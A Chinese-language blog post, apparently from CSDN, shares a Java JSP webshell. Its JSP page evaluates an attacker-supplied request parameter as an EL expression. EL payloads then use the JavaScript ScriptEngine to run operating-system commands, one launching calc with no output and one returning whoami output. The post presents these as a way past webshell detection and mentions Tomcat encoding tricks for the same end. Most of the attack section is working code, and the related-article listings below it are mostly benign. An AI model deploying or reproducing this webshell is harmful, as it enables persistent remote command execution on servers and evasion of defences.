java el表达式+scriptengine webshell 分享

最新推荐文章于 2024-05-21 22:13:42 发布
最新推荐文章于 2024-05-21 22:13:42 发布
阅读量337 收藏
点赞数 1
分类专栏: 技术分享 文章标签: java 开发语言 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/129205612
版权

前言:

翻自己以前写过的东西,在土司翻到了以前提到过的这个问题,这个问题之前查看别的师傅写的文章,很早就有了相关的解决方法,但是一直没回复这种的解决思路,这里分享下,主要分享el表达式加scriptengine的思路,也当作水篇文章吧。
image.png

运用:

el表达式的shell

<%@ page import="org.apache.jasper.runtime.PageContextImpl" %>
<%
    String res = (String)
            PageContextImpl.proprietaryEvaluate(request.getParameter("test"),
                    String.class, pageContext, null);
    out.print(res);
%>

无回显:

code=${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("new+java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','calc']).start()")}

image.png

有回显:

回显payload:

${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("var+s=[3];s[0]=\"cmd\";s[1]=\"/c\";s[2]=\"whoami\";var+p=java.lang.Runtime.getRuntime().exec(s);var+sc=new+java.util.Scanner(p.getInputStream(),\"GBK\").useDelimiter(\"\\\\A\");var+result=sc.hasNext()?sc.next():\"\";sc.close();result;")}

image.png

其他思路:

4ccbbca01491389ba5ab4a89aa99fa8.jpg
当然啦远程webshell和jni马的思路也是可以绕过的,也不一定要用这个思路,甚至于还可以利用补天大会老面提到的一个点,tomcat的编码特性来进行绕过。
如编码特性图:webshell内容为
image.png
执行:
image.png

最后:

好好学习,好好锻炼,好好生活。
7f337659e65b63146b8fd4a6ea5523f.jpg

goddemon
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
基于Dagger+Java ScriptEngine+Java Selenium的自动化测试框架.zip
03-23
基于Dagger+Java ScriptEngine+Java Selenium的自动化测试框架
EL表达式(很全很强大)
03-28
1)语法结构${expression}, EL 提供.和[]两种运算符来存取数据${user.My-Name}应当改为${user["My-Name"] }。在EL中则可以使用param和paramValues两者来取得数据。 ${param.name} ${paramValues.name}
ScriptEngine that running java code; Real JavaScript.zip
06-16
ScriptEngine that running java code; Real JavaScript.zip
封装好的Java调用JavaScript引擎工具
10-11
其实使用javascript动态调试测试功能,是一个很好的方式,
使用java调用js
07-14
该class文件讲述了利用ScriptEngine来实现用java调用js的方法,由于js的动态性,在某些方面特别用于,例如,输入字符串优先级运算问题,使用该方法特别方便
Java脚本引擎/动态脚本/表达式引擎
秋装什么的博客
12-17 866
Java脚本引擎/动态脚本/表达式引擎。
url上接收到 el表达式 不渲染_JSP Webshell那些事 -- 攻击篇(上)
weixin_39938875的博客
11-22 286
前言目前很多大型厂商都选择使用Java进行Web项目的开发,近年来随着各种JAVA指定环境RCE漏洞的出现,Java Web的安全逐渐被人们所重视,与漏洞相关的还有用于后期维持权限的Webshell。与PHP不同的是,JSP的语言特性较为严格,属于强类型语言,并且在JDK9以前并没有所谓的eval函数。一般而言JSP的变形免杀较为困难,但是依旧存在很多的"黑魔法"。不知攻,焉知防。阿里云安骑士We...
java 代码执行el,专属于java的漏洞——EL表达式注入
weixin_39997443的博客
03-20 1116
前言“FSRC经验分享”系列文章,旨在分享焦点科技信息安全部工作过程中的经验总结,包括但不限于漏洞分析、运营技巧、sdl推行、等保合规、自研工具等等。欢迎各位安全从业者持续关注~0x01EL简介表达式语言(Expression Language 以下简称EL)是以JSTL(JavaServer Pages Standard Tag Library,JSP标准标签库)的一部分出现的,原本被叫做SPE...
java使用ScriptEngine: 使用java调用脚本、解析表达式
浮梦一场
04-12 1982
String obj="salesCount&gt;90"; ScriptEngineManager manager=new ScriptEngineManager(); ScriptEngine engineByName = manager.getEngineByName("JavaScript"); obj= obj.replaceAll("salesCount","14");...
【网络安全】反序列化漏洞底层扩展与制作WebShell
HBohan的博客
08-07 593
XMLDecoder反序列化漏洞底层 参考的文章已经分析的非常详细了,这里我主要是就是一下最后的执行是怎么样的。也就是Expression类的使用 import java.beans.Expression; public class test { public static void main(String[] args)throws Exception { Parameter();//有参数 NoParameter();//无参数 } publi.
Java使用ScriptEngine说明
07-12
Java使用ScriptEngine说明
webshell初探
zkaqlaoniao的博客
10-31 35
这个小思路也是启发于这位师傅,同时也想到了之前的RWCTF中的题目,而从本质上讲也许可以把它看作是EL表达式注入的另类使用。我们从最初的到再到足够小,一句话就可以实现命令执行+回显的功能。避免出现
Java表达式注入(JSP EL表达式注入)
GalaxySpaceX的博客
08-16 860
Java表达式注入(JSP EL表达式注入)
jar包增量更新分析
junlaiyan的专栏
05-16 372
借助jdeps分析出jar包的增量文件
分布式锁2-Zookeeper分布式锁实战
qq_43676797的博客
05-19 212
使用curator操作Zookeeper进行实战;:Apache Curator包含一套高级API框架和工具类,它 是Apache ZooKeeper 的Java 客户端库。
命令执行漏洞(二)
XLbb的博客
05-15 1003
POST方法,S2-045-bypass-2漏洞存在!,程序更改为S2-045-bypass-2漏洞测试模式, 响应码: 200。POST方法,S2-046-bypass漏洞存在!POST方法,S2-045-bypass漏洞存在!POST方法,S2-046-1漏洞存在!POST方法,S2-046-2漏洞存在!POST方法,S2-046-3漏洞存在!POST方法,S2-045-1漏洞存在!POST方法,S2-045-3漏洞存在!POST方法,S2-045-2漏洞存在!POST方法,S2-045-4漏洞存在!
java数据结构与算法(验证二叉搜索树)
磐门的博客
05-17 339
节点返回空为ture,节点的值不在对应数据大小范围内返回false。将验证二叉搜索树计算同样可以转换为相同子问题,所以比较适合用递归。node为root的左节点时,max更新为root.val。node为root的右节点时,min更新为root.val。
Kubernetes 审计日志采集与分析最佳实践
观测云的博客
05-17 1073
​Kubernetes 在 1.7 版本中发布了审计(Audit)日志功能,通过审计日志,我们能够非常清晰的知道 K8S 集群到底发生了什么事情。
Spring6基础笔记
最新发布
质胜文则野,文胜质则史。文质彬彬,然后君子。
05-21 677
Spring 是一款主流的 Java EE 轻量级开源框架 ,Spring 由“Spring 之父”Rod Johnson 提出并创立,其目的是用于简化 Java 企业级应用的开发难度和开发周期。Spring的用途不仅限于服务器端的开发。从简单性、可测试性和松耦合的角度而言,任何Java应用都可以从Spring中受益。Spring 框架除了自己提供功能外,还提供整合其他技术和框架的能力。Spring 自诞生以来备受青睐,一直被广大开发人员作为 Java 企业级应用程序开发的首选。时至今日,Spring 俨然
java 执行表达式
05-25
Java中执行表达式有多种方式,以下是其中几种常见的方式: 1. 使用eval()方法:eval()方法可以将字符串表达式作为参数传递进去,然后执行该表达式并返回结果。但需要注意的是,eval()方法只能执行单行表达式,不能执行多行语句。例如: ``` String expression = "2 + 3 * 4"; ScriptEngineManager manager = new ScriptEngineManager(); ScriptEngine engine = manager.getEngineByName("js"); Object result = engine.eval(expression); System.out.println(result); // 输出14 ``` 2. 使用JavaScript引擎:Java中提供了JavaScript引擎,可以用来执行JavaScript表达式。例如: ``` String expression = "2 + 3 * 4"; ScriptEngineManager manager = new ScriptEngineManager(); ScriptEngine engine = manager.getEngineByName("JavaScript"); Object result = engine.eval(expression); System.out.println(result); // 输出14 ``` 3. 使用Groovy:Groovy是一种基于Java语言的动态语言,它可以直接执行表达式,并且支持更灵活的语法。例如: ``` String expression = "2 + 3 * 4"; Binding binding = new Binding(); GroovyShell shell = new GroovyShell(binding); Object result = shell.evaluate(expression); System.out.println(result); // 输出14 ``` 4. 使用JEXL:JEXL是一个基于Java的表达式语言,它可以简化Java代码中的表达式处理。例如: ``` String expression = "2 + 3 * 4"; JexlEngine engine = new JexlEngine(); JexlExpression expr = engine.createExpression(expression); Object result = expr.evaluate(null); System.out.println(result); // 输出14 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值